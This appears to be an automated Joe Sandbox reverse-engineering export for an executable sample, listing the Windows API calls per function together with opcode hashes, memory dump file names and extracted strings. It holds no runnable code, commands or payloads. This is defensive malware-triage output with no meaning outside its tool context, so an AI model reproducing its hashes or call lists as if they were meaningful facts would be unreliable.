                                                                  • API String ID: 996205394-0
                                                                  • Opcode ID: 4237aaeb46cccb602a0984120901f33fbc0742d29dd2597d22a60c95cf2cdb97
                                                                  • Instruction ID: 6aec8b371c9fab22d9bb11c82ff679e6f8f2bf4797d8e8c33563a997009e8f8d
                                                                  • Opcode Fuzzy Hash: 4237aaeb46cccb602a0984120901f33fbc0742d29dd2597d22a60c95cf2cdb97
                                                                  • Instruction Fuzzy Hash: DF514EB5A00209EFCB14DF66C484AAEBBB5FF84314F14847AE916AB391D738E941CF54
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 004070B4
                                                                  • SendMessageA.USER32(?,00000138,?,?), ref: 00407138
                                                                  • GetBkColor.GDI32(?), ref: 00407141
                                                                  • GetTextColor.GDI32(?), ref: 0040714D
                                                                  • GetThreadLocale.KERNEL32(0000F1C0), ref: 004071DF
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Color$H_prologLocaleMessageSendTextThread
                                                                  • String ID:
                                                                  • API String ID: 741590120-0
                                                                  • Opcode ID: 690d7af245a93de95a2d746acce73e69c4852c2c64f9a7fa874139ff42539c16
                                                                  • Instruction ID: 20cee96fae53f77c6612ec2f8febb233d27f76521b7ee9c4483379ac0ab0fb9c
                                                                  • Opcode Fuzzy Hash: 690d7af245a93de95a2d746acce73e69c4852c2c64f9a7fa874139ff42539c16
                                                                  • Instruction Fuzzy Hash: 7C518E30904306DFCB10EF65C8445AAB7B0FF44314B10896EF856AB3A1E778B955CB6A
                                                                  APIs
                                                                    • Part of subcall function 00426ED9: GetParent.USER32(?), ref: 00426F2C
                                                                    • Part of subcall function 00426ED9: GetLastActivePopup.USER32(?), ref: 00426F3B
                                                                    • Part of subcall function 00426ED9: IsWindowEnabled.USER32(?), ref: 00426F50
                                                                    • Part of subcall function 00426ED9: EnableWindow.USER32(?,00000000), ref: 00426F63
                                                                  • EnableWindow.USER32(?,00000001), ref: 00426FB7
                                                                  • SendMessageA.USER32(?,00000376,00000000,00000000), ref: 00426FCB
                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,?,00000000), ref: 00427041
                                                                  • MessageBoxA.USER32(?,?,?,000000F0), ref: 00427065
                                                                  • EnableWindow.USER32(?,00000001), ref: 00427081
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Window$Enable$Message$ActiveEnabledFileLastModuleNameParentPopupSend
                                                                  • String ID:
                                                                  • API String ID: 489645344-0
                                                                  • Opcode ID: 42c07a88efa4cedc6cfd4f5157a7262d5df472f227f5db3fb4d65e13e20a45ba
                                                                  • Instruction ID: 94a83bf1e9e898c293309cd3d0189100989e43beb641fad24fa4ba7b3a2eaaf4
                                                                  • Opcode Fuzzy Hash: 42c07a88efa4cedc6cfd4f5157a7262d5df472f227f5db3fb4d65e13e20a45ba
                                                                  • Instruction Fuzzy Hash: 4531E531B043689FEF309FA5ED80B9EB7B4AF05700F55002EEA05AB281DBB99D058B55
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00428681
                                                                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 004286AA
                                                                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 004286CE
                                                                  • RegDeleteKeyA.ADVAPI32(?,?), ref: 00428761
                                                                  • RegCloseKey.ADVAPI32(?), ref: 0042876F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: CloseDeleteEnumH_prologOpen
                                                                  • String ID:
                                                                  • API String ID: 3131381098-0
                                                                  • Opcode ID: 3da1cfe8e0bdcdf6bb3580b66696eb1dbd77266631f15c1d34462537c3854d5f
                                                                  • Instruction ID: 3b1ea214686a536e0a2d4bea5f1d2e89e807bfaa4abb09b0d42beed4e779e599
                                                                  • Opcode Fuzzy Hash: 3da1cfe8e0bdcdf6bb3580b66696eb1dbd77266631f15c1d34462537c3854d5f
                                                                  • Instruction Fuzzy Hash: 6521BC32E00128AFDB21DB54DC44BEEB7B4FB08310F0042AAE855B72A0CB388E51DF94
                                                                  APIs
                                                                    • Part of subcall function 00423C94: GetDlgItem.USER32(?,?), ref: 00423CA1
                                                                  • SendMessageA.USER32(?,00000087,00000000,00000000), ref: 004272F4
                                                                  • SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 00427308
                                                                  • SendMessageA.USER32(?,000000F1,00000000,00000000), ref: 0042732E
                                                                  • GetWindow.USER32(?,00000002), ref: 00427338
                                                                  • GetWindowLongA.USER32(00000000,000000F0), ref: 00427348
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window$ItemLong
                                                                  • String ID:
                                                                  • API String ID: 1613074769-0
                                                                  • Opcode ID: 97cbf4e57a23a0da11286c9286a259086bce15a030b63461e7beaaeda3af21d2
                                                                  • Instruction ID: fe25e8e1c6ca3775ff26ef85d9a3a830e02c818cf282e5b9224e09687ff5b461
                                                                  • Opcode Fuzzy Hash: 97cbf4e57a23a0da11286c9286a259086bce15a030b63461e7beaaeda3af21d2
                                                                  • Instruction Fuzzy Hash: FC116D7120422AFFDF109F51EC84EAA7B29FF443A4F508126FD154A2A0CB34AD51DBA4
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: ErrorH_prologLastgethostbynamehtonsinet_addr
                                                                  • String ID:
                                                                  • API String ID: 3864313882-0
                                                                  • Opcode ID: 4b5bd378ccf6621e41f5217fc09554331f5af7f9c8d6f30778e4ca4430e9895b
                                                                  • Instruction ID: 55ba63c0e82c93a398f165e94c6545409e9e25af3e370e3a1538512de266e412
                                                                  • Opcode Fuzzy Hash: 4b5bd378ccf6621e41f5217fc09554331f5af7f9c8d6f30778e4ca4430e9895b
                                                                  • Instruction Fuzzy Hash: 4D116D31A00228DFCB10EFA5E8859EDBBB4FF08754F40456AF405A72A1D7389A51CF99
                                                                  APIs
                                                                  • GetMapMode.GDI32(?,?,?,?,?,?,00407712,?,00000000,?,7694E800), ref: 00427DC5
                                                                  • GetDeviceCaps.GDI32(?,00000058), ref: 00427DFF
                                                                  • GetDeviceCaps.GDI32(?,0000005A), ref: 00427E08
                                                                    • Part of subcall function 00426049: MulDiv.KERNEL32(?,00000000,00000000), ref: 00426089
                                                                    • Part of subcall function 00426049: MulDiv.KERNEL32(00000000,00000000,00000000), ref: 004260A6
                                                                  • MulDiv.KERNEL32(?,000009EC,00000060), ref: 00427E2C
                                                                  • MulDiv.KERNEL32(00000000,000009EC,7694E800), ref: 00427E37
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: CapsDevice$Mode
                                                                  • String ID:
                                                                  • API String ID: 696222070-0
                                                                  • Opcode ID: 4f3f8492715973c01261396f95e4a9daf1e0a3e3b78cb544d1ec3266c9131d15
                                                                  • Instruction ID: 2e381f7fe369a97062e71ca8c090e36ae9c4614a4b77d937c301da42c517efac
                                                                  • Opcode Fuzzy Hash: 4f3f8492715973c01261396f95e4a9daf1e0a3e3b78cb544d1ec3266c9131d15
                                                                  • Instruction Fuzzy Hash: E711C231700624AFDB21AF5ADC44C2EBBA9FF88710752042AFA4597360C775AC028F94
                                                                  APIs
                                                                  • GetLastError.KERNEL32(?,00000000,0040F9CC,004108AA,00000000,00431B30,00000008,00410901,?,?,?,00410723,00000004,00431B20,00000010,0041200F), ref: 00411DA7
                                                                  • FlsGetValue.KERNEL32(?,00410723,00000004,00431B20,00000010,0041200F,00000001,0000008C,?,00431A70,00000060), ref: 00411DB5
                                                                  • SetLastError.KERNEL32(00000000,?,00410723,00000004,00431B20,00000010,0041200F,00000001,0000008C,?,00431A70,00000060), ref: 00411E0B
                                                                    • Part of subcall function 004106DA: __lock.LIBCMT ref: 0041071E
                                                                    • Part of subcall function 004106DA: HeapAlloc.KERNEL32(00000008,?,00431B20,00000010,0041200F,00000001,0000008C,?,00431A70,00000060), ref: 0041075C
                                                                  • FlsSetValue.KERNEL32(00000000,?,00410723,00000004,00431B20,00000010,0041200F,00000001,0000008C,?,00431A70,00000060), ref: 00411DDC
                                                                  • GetCurrentThreadId.KERNEL32 ref: 00411DF4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastValue$AllocCurrentHeapThread__lock
                                                                  • String ID:
                                                                  • API String ID: 3368326513-0
                                                                  • Opcode ID: a2e0e11b31321dbee8d00aaa3ff715e8f4c10284b2315e1796a463f44e233b22
                                                                  • Instruction ID: 2e555c96cbcdb27f1e987eae822a5d52ba16f41a925a0101c91ccab380ceafb0
                                                                  • Opcode Fuzzy Hash: a2e0e11b31321dbee8d00aaa3ff715e8f4c10284b2315e1796a463f44e233b22
                                                                  • Instruction Fuzzy Hash: 9CF0FC31B01711DFD7301FB1AC4A6877BA4FB00762B00563AF982E62B0CB74884147E8
                                                                  APIs
                                                                  • TlsFree.KERNEL32(00695838,?,?,00429DC7,00000000,00000001), ref: 00429D76
                                                                  • GlobalHandle.KERNEL32(00662F78), ref: 00429D84
                                                                  • GlobalUnlock.KERNEL32(00000000,?,?,00429DC7,00000000,00000001), ref: 00429D8D
                                                                  • GlobalFree.KERNEL32(00000000), ref: 00429D94
                                                                  • DeleteCriticalSection.KERNEL32(0043F184,?,?,00429DC7,00000000,00000001), ref: 00429D9E
                                                                    • Part of subcall function 00429BB8: EnterCriticalSection.KERNEL32(?), ref: 00429C15
                                                                    • Part of subcall function 00429BB8: LeaveCriticalSection.KERNEL32(?,?), ref: 00429C25
                                                                    • Part of subcall function 00429BB8: LocalFree.KERNEL32(?), ref: 00429C2E
                                                                    • Part of subcall function 00429BB8: TlsSetValue.KERNEL32(?,00000000), ref: 00429C40
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: CriticalFreeGlobalSection$DeleteEnterHandleLeaveLocalUnlockValue
                                                                  • String ID:
                                                                  • API String ID: 1549993015-0
                                                                  • Opcode ID: cda239e742f0368a0fb7abb0ada14223e37cfef73ab97b54edbb53a213948107
                                                                  • Instruction ID: f3a137cc99f00e13c3aa807b9edadb0f25c424e624a33044372182c2df137c47
                                                                  • Opcode Fuzzy Hash: cda239e742f0368a0fb7abb0ada14223e37cfef73ab97b54edbb53a213948107
                                                                  • Instruction Fuzzy Hash: DFF089313005109BD631AB39BC48A7B76BCAF85711B95066AF816D3351D738DC03576D
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 0040B697
                                                                  • CoTaskMemAlloc.OLE32(?,?,?,00000000), ref: 0040B7BE
                                                                  • CoTaskMemFree.OLE32(?,?,00000000), ref: 0040B9D6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Task$AllocFreeH_prolog
                                                                  • String ID:
                                                                  • API String ID: 1522537378-3916222277
                                                                  • Opcode ID: 929f9b5ebdec0014ec1f74a148c8dfc2360b127b466e663828303ad3da1abc5d
                                                                  • Instruction ID: ad970cdde69fdafffcc6cb1f39cb6ed57967dbf095fb62cede4e6b66b95c3350
                                                                  • Opcode Fuzzy Hash: 929f9b5ebdec0014ec1f74a148c8dfc2360b127b466e663828303ad3da1abc5d
                                                                  • Instruction Fuzzy Hash: 06C13970A00608DFCB24DFA9C884AAEB7B5FF88304F20456EE546E7391DB75A945CF58
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: ClearH_prologVariant
                                                                  • String ID: @$@
                                                                  • API String ID: 1166855276-149943524
                                                                  • Opcode ID: f802b67e1e94a0780ee79d7fc30415edf74127099df7fd6265c2581392f00dde
                                                                  • Instruction ID: ef86999ad6ee6f5cf559b2610e0ac6289f61f51e6328f32c9ffdf30846b8a703
                                                                  • Opcode Fuzzy Hash: f802b67e1e94a0780ee79d7fc30415edf74127099df7fd6265c2581392f00dde
                                                                  • Instruction Fuzzy Hash: 9151B7B1A002199FDB04CFA9C9889EEBBF9FF48314F14456EE506EB250E774A945CF60
                                                                  APIs
                                                                  • GetMenuCheckMarkDimensions.USER32 ref: 004289E3
                                                                  • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 00428A85
                                                                  • LoadBitmapA.USER32(00000000,00007FE3), ref: 00428A9D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu
                                                                  • String ID:
                                                                  • API String ID: 2596413745-3916222277
                                                                  • Opcode ID: 570439933a1f319fde7bfb3e8c61f190201eae6d5acc9754518f2f5729fa7a47
                                                                  • Instruction ID: 0d6f9ecc143259180f96a21dbcd0bf36dcd83b506795b2bb56614b56ad416b1c
                                                                  • Opcode Fuzzy Hash: 570439933a1f319fde7bfb3e8c61f190201eae6d5acc9754518f2f5729fa7a47
                                                                  • Instruction Fuzzy Hash: 16213E71F002159FEB10CFB9EC85AAE7BB5EB44301F40053BE500EB291DA749545C794
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog
                                                                  • String ID: 4C$TC$hC
                                                                  • API String ID: 3519838083-3679543769
                                                                  • Opcode ID: 6afed17d75f7f19130cad6cc9927d4617893c8389d2f54df1ee85911ac5e8f29
                                                                  • Instruction ID: 9a0aca956e13d3f40c7eff973b07ae7f3d28aa8e56d2adae96ddab1538bd35f0
                                                                  • Opcode Fuzzy Hash: 6afed17d75f7f19130cad6cc9927d4617893c8389d2f54df1ee85911ac5e8f29
                                                                  • Instruction Fuzzy Hash: D831AEB0901B448FD324CF6AC55579AFBE8BFA4308F009A1FD1EA97660C7B86548CF59
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog
                                                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                  • API String ID: 3519838083-1866435925
                                                                  • Opcode ID: e1ee01469c0e13428d3df627346f863c2c2c07cf1eaebd9726a8b87e83a413b8
                                                                  • Instruction ID: ade85976828e3d0575b485422f14fa1a4d307c6e90aafc8175f67c845a6277e5
                                                                  • Opcode Fuzzy Hash: e1ee01469c0e13428d3df627346f863c2c2c07cf1eaebd9726a8b87e83a413b8
                                                                  • Instruction Fuzzy Hash: B61136719402089AD714EFE1CA92BDDB774EF04308F64902FA54567282EB7D6A85CB8C
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: H_prologIncrefstd::locale::facet::_
                                                                  • String ID: bad cast
                                                                  • API String ID: 931760182-3145022300
                                                                  • Opcode ID: 290d518eec50fe1289dc1a0e10ba9f74f951f3f8ce5a6758bf498ef8c1fa942f
                                                                  • Instruction ID: 133a5817c143689152e06119c2ce411d04637f97aac18120fb756b8f5cb4bf46
                                                                  • Opcode Fuzzy Hash: 290d518eec50fe1289dc1a0e10ba9f74f951f3f8ce5a6758bf498ef8c1fa942f
                                                                  • Instruction Fuzzy Hash: 0211A3B1E40224A7CB05EBA5CD41AEEB325AF84328F54022FF421A72C1CF3C9A45C799
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 0041C94D
                                                                  • int.LIBCPMT ref: 0041C971
                                                                    • Part of subcall function 0041C9EC: __EH_prolog.LIBCMT ref: 0041C9F1
                                                                  • std::locale::facet::_Incref.LIBCPMT ref: 0041C9C4
                                                                    • Part of subcall function 0040E342: RaiseException.KERNEL32(?,?,?,?,0043F1A0,00000000), ref: 0040E370
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog$ExceptionIncrefRaisestd::locale::facet::_
                                                                  • String ID: bad cast
                                                                  • API String ID: 854657108-3145022300
                                                                  • Opcode ID: bd94b3fcc8be1ba825f3ac1fe391770fd2c7786acee73afc308fbf7023a4f06d
                                                                  • Instruction ID: e7bd6d74a278fbe87ccbf35d9b5790177d99eb31d3876a67708471b84b454a11
                                                                  • Opcode Fuzzy Hash: bd94b3fcc8be1ba825f3ac1fe391770fd2c7786acee73afc308fbf7023a4f06d
                                                                  • Instruction Fuzzy Hash: EC1173B2E4011497CF14EBA5D842BEE7334AF44368F50062FF421B72D1CB3C99448798
                                                                  APIs
                                                                  • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 004282FE
                                                                  • PathFindExtensionA.SHLWAPI(?), ref: 00428315
                                                                  • lstrcpyA.KERNEL32(00000000,?), ref: 0042833F
                                                                    • Part of subcall function 00427FF6: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00428019
                                                                    • Part of subcall function 00427FF6: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 00428024
                                                                    • Part of subcall function 00427FF6: ConvertDefaultLocale.KERNEL32(?), ref: 00428055
                                                                    • Part of subcall function 00427FF6: ConvertDefaultLocale.KERNEL32(?), ref: 0042805D
                                                                    • Part of subcall function 00427FF6: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 0042806A
                                                                    • Part of subcall function 00427FF6: ConvertDefaultLocale.KERNEL32(?), ref: 00428084
                                                                    • Part of subcall function 00427FF6: ConvertDefaultLocale.KERNEL32(000003FF), ref: 0042808A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
